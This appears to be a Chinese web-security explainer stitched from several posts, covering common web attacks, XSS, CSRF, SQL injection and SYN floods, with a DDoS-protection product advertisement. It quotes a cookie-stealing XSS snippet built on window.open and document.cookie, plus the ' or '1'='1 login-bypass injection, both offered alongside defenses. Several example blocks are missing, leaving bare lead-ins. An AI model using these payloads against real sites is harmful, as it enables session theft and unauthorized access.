网站攻击有几种_web网站常见攻击

常见的web攻击有什么？

Web服务可以认为是一种程序，它使用HTTP协议将网站中的文件提供给用户，以响应他们的请求。这些请求由计算机中的HTTP客户端转发。为Web服务提供硬件基础的专用计算机和设备称为Web服务器。从这种网络设计中可以看到，Web服务器控制着大量信息。如果一个人拥有进入Web服务器修改数据的能力，那他就可以对该Web服务器所服务的信息和网站做任何他想做的事情。有以下七种常见攻击：

1.目录遍历攻击 - 此类攻击利用Web服务器中的漏洞来未经授权地访问不在公共域中的文件和文件夹。一旦攻击者获得访问权限，他们就可以下载敏感信息，在服务器上执行命令或安装恶意软件。

2.拒绝服务攻击 - 借助此攻击类型，Web服务器将会无法被合法用户访问，一般表现为超时，崩溃。这通常被攻击者用于关闭具有特定任务的服务器。

3.域名劫持 -在此攻击中，攻击者更改DNS设置以重定向到他自己的Web服务器。

4.嗅探 - 在没有加密的情况下，通过网络发送的数据可能会被截获。通过对数据的分析攻击者可能会获得对Web服务器的未授权访问或身份伪造的能力。

5.网络钓鱼 - 这是一种将真实网站克隆到虚假网站的攻击，用户不知道他们是否在真实的网站上。这种攻击通过欺骗用户来窃取敏感信息，如登录密码、银行卡详细信息或任何其他机密信息。

6.域欺骗 - 在此攻击中，攻击者会破坏域名系统（DNS）或用户计算机，以便将流量定向到恶意站点。

7.Web破坏 - 通过这种类型的攻击，攻击者用自己的页面替换组织的网站。这种情况下，无论攻击者想在网站上取代什么，他都可以在这次攻击中做到。

如果遇到攻击却没有一个专业的程序员维护，网站会经常性的出现很多问题，网页打开缓慢、延迟、打不开甚至死机，因此流失很多客户。

推荐杭州超级科技的超级盾！主要针对HTTP/HTTPS类Web业务的全球分布式云防御产品。具有DDoS防御、CC防御、云WAF等功能。客户自身不需要在本地部署任何安全设备，只需采用CNAME替换网站A记录、或高防IP方式即可快速接入我们的服务。超级盾（WEB版）智能DNS能快速调度到全球离客户最近的清洗中心，具有智能路由、智能加速的特性。

前端程序员必须知道的 Web 漏洞，快来看看

随着互联网的发展，早已经不是仅限于简单的网页或是社交，电商购物、银行转账、企业管理等等。上次看到一个新闻，后台程序员离职后，利用职位之便，每天还不断的给自己转账，转了好多次才被发现，想想这多可怕。或者会窃取重要的商业信息，所以 Web 安全也是非常值得注意的。

什么是 Web 安全？

黑客利用网络操作系统的漏洞和 Web 服务器的 SQL 注入漏洞等，得到 Web 服务器的控制权，轻则篡改、删除、添加数据，重则窃取重要的商业信息、转账等，更严重的就是在网页中植入恶意代码，使网站受到不可预期的侵害。

常见的攻击可分为三类：XSS、CSRF、SQL注入。

Cross Site Scripting 跨站脚本攻击，为了与 CSS 区分，所以简写为 XSS 。

恶意攻击给 Web 页面植入恶意的 Script 代码，当用户浏览该网页的时候，嵌入 Web 里面的 script 代码会被执行，从而达到攻击的效果。

讲直白点，就是恶意攻击者通过在输入框处添加恶意 script 代码，用户浏览网页的时候执行 script 代码，从而达到恶意攻击用户的目的。

1.1、XSS 的危害

1.2、XSS 的攻击类型

发出请求时，XSS代码会出现在 url 中，作为输入提交到服务器端，服务器再返回给浏览器，然后浏览器解析执行 XSS 代码，这一过程像一次反射，所以称之为反射型。

这种类型的攻击，通常是把 XSS 攻击代码放入请求地址的 数据传输部分，如：

提交的 XSS 代码会存储在服务器端，如数据库、内存、文件系统内，下次请求目标页面时不再提交 XSS 代码。

文档型的 XSS 攻击不会经过服务器，作为中间人的角色，在数据传输过程中劫持到网络数据包，然后修改里面的 html 文档。

1.3、XSS 的防御措施

措施1：编码。

对这些数据进行 html entity 编码。客户端和服务器端都需要进行转义编码。

转义后为：

放入上边的代码中，还是会自动解析为上边的代码，所以放到外边。

措施2：过滤。

移除用户上传的 DOM 属性，如上边的 onerror。

移除用户上传的 style、script、iframe 节点。

措施3：利用 CSP

浏览器中的内容安全策略，就是决策浏览器加载哪些资源。

Cross site request forgery 跨站点请求伪造。

攻击者诱导受害者进入第三方网站，向被攻击网站发送跨站请求，利用被攻击者在被攻击网站已经获取的注册凭证，绕过后台的用户验证达到冒充用户对攻击网站进行的某种操作。

CSRF 攻击特点：

2.1、CSRF 的危害

2.2、CSRF 的攻击类型

使用非常简单，只需要一个 http 请求。

比如页面中的一个图片添加链接，还有 iframe、script ，最容易完成 CSFR 攻击，且不易被用户发现，隐蔽性超强。

由于 get 接口是最常见的一种 CSRF 攻击类型，所以很多重要的接口不适用 get 方式，使用 post 一定程度上可以防止 CSRF 攻击。

这种类型的 SCRF 攻击，通常使用的是一个自动提交的表单。简单讲就是伪造一个自动提交的表单，一旦访问页面时，表单就会自动提交。

如：

比起前两个，这个类型的比较少见，链接类型的攻击必须要用户点击链接，才能触发。

通常在论坛中发布的图片嵌入恶意的链接，或以广告的形式诱导用户点击中招。所以我们在邮箱中看到乱七八糟的广告，尽量别点击，防止遇到三方攻击。

伪造一种新型的攻击方式，用户误以为是在网站正常登录，实际上是使用账户和密码登录到了黑客网站，这样黑客可以监听到用户的所有操作，甚至知道用户的账户信息。

2.3、CSRF 的防御措施

措施1：检查 http 头部的 referer 信息

referer 包含在请求头内，表示请求接口的页面来源。

服务端通过检查 referer 信息，发现来源于外域时，就可以拦截请求，通过阻止不明外域的访问，一定程度上可以减少攻击。

措施2：使用一次性令牌

使用一次性令牌做身份识别，黑客是无法通过跨域拿到一次性令牌的，所以服务端可以通过判断是否携带一次性令牌，就可以排除一部分的非法操作者。

措施3：使用验证图片

服务端生成一些文本和数字，在服务端保存这份信息，同时以图片的形式在客户端展现，让用户去合法填写信息，当 CSRF 攻击时，拿不到这个验证码的时候，无法向服务器提供这个信息，导致匹配失败，从而识别它是非法攻击者。

这个应用非常常见，之前登录的时候，需要填写图形验证码。

现在滑动图片验证也非常常见。

SQL 注入，一般发生在注册、评论、添加等，只有有用户输入的地方，就有可能发生 SQL 注入。SQL 注入是一种常见的 Web 安全漏洞，攻击者会利用这个漏洞，可以访问或修改数据，利用潜在的数据库漏洞进行攻击。

所谓SQL注入，就是通过把SQL命令插入到Web 表单 提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将(恶意的)SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到 SQL注入式攻击 .

3.1、SQL 注入危害

任意的账号都可以登录，可以进行任意的操作，粗暴点讲，就是随便来。

3.2、 SQL注入分类

当输入的参数为整数时，则有可能存在数字型漏洞。

当输入参数为字符串时，则可能存在字符型注入漏洞。数字型与字符型注入最大的区别在于：数字型不需要单引号闭合，而字符型一般需要使用单引号来闭合。

字符型注入最关键的是如何闭合 SQL 语句以及注释多余的代码。

其实我觉得 SQL 注入只有两种类型：数字型与字符型。很多人可能会说还有如：Cookie 注入、POST 注入、延时注入等。

的确如此，但这些类型的注入归根结底也是数字型和字符型注入的不同展现形式或者注入的位置不同罢了。

以下是一些常见的注入叫法：

3.3、SQL注入的防范措施

凡是用户输入的地方，我们都应该防止黑客攻击，永远不要相信用户的输入。所以对应的防御措施分别有：

前后端分离之后，前端每天都会接触到很多接口。发送网络请求的时候，有些接口就会使用 get 方法。最常见的传参方式就是，直接在 url 地址后面加参数。

直接采用这种方式传输数据，如果数据被劫持或抓包工具偷走之后，就会直接被人盗取走，特别危险。若是采用接口加密，如下：

上边那个看不懂的一长串符号，正是经过加密的数据。

接口加密就是将接口请求调用中传递的参数进行加密，目的就是为了保证接口请求中传递参数和返回的结果的安全性，一般比较敏感数据，如身份证、电话号码、账号、密码等需要进行加密。

常见的加密方式：

加密方式较多，可以根据自己具体的需要和项目语言选择其中一种。

加密之后的数据更安全，那我们能不能将接口所有的数据都进行加密呢？加密是非常消耗资源的，如果有大批量的数据都进行加密时，返回数据需要的时间就更长，会直接影响用户体验。所以我们进行加密时，只需要对敏感的重要的信息进行加密。

好了我今天的文章就到此结束了，本篇文章没有介绍到的 web 安全，欢迎评论区交流！

web常见的攻击方式有哪些，如何避免。

原理：1.登录受信任网站A，并在本地生成Cookie。

            2.在不登出A的情况下，访问危险网站B,引诱点击链接，实际上是调用A网站的链接，或者是接口地址，利用A的cookie未失效。

触发条件：A网站存在漏洞，用户在A网站登录过且cookie未失效

预防：token认证，访问网站，登录成功后，服务器生成token，存放在cookie里，session，或者本地，在访问接口的时候要求把token带上，到服务器端在验证（token最好是随机的，不可预测的）

         referer认证，页面来源（在hearder里），服务器判断是否是本站点下的页面，如果不是直接拦截。

XSS：跨站脚本攻击，不需要登录，向网站注入脚本（盗用cookie，改变页面的dom结构，重定向链接）。

博客网站，攻击者在上面发了一篇文章，内容是scriptwindow.open(“”+document.cookie)/script浏览器运行非法的html 标签/Javascript,用户下次访问就会把cookie发送到攻击者的服务器上。

预防：将输入的数据进行转义处理，比如说讲 转义成lt

SQL注入：sql语句伪造参数，

最常见的就是：' or '1'= '1。这是最常见的sql注入攻击，当我们输如用户名 jiajun ，然后密码输如'or '1'= '1的时候，我们在查询用户名和密码是否正确的时候，本来要执行的是select * from user where username='' and password='',经过参数拼接后，会执行sql语句 select * from user where username='jaijun' and password=' ' or ' 1'='1 '，这个时候1=1是成立，自然就跳过验证了。

预防：接口可以对采纳数进行转义，密码什么的敏感信息要加密

SYN Flood ,简单说一下tcp三次握手，客户端先服务器发出请求，请求建立连接，然后服务器返回一个报文，表明请求以被接受，然后客户端也会返回一个报文，最后建立连接。那么如果有这么一种情况，攻击者伪造ip地址，发出报文给服务器请求连接，这个时候服务器接受到了，根据tcp三次握手的规则，服务器也要回应一个报文，可是这个ip是伪造的，报文回应给谁呢，第二次握手出现错误，第三次自然也就不能顺利进行了，这个时候服务器收不到第三次握手时客户端发出的报文，又再重复第二次握手的操作。如果攻击者伪造了大量的ip地址并发出请求，这个时候服务器将维护一个非常大的半连接等待列表，占用了大量的资源，最后服务器瘫痪。

预防：增加服务器带宽。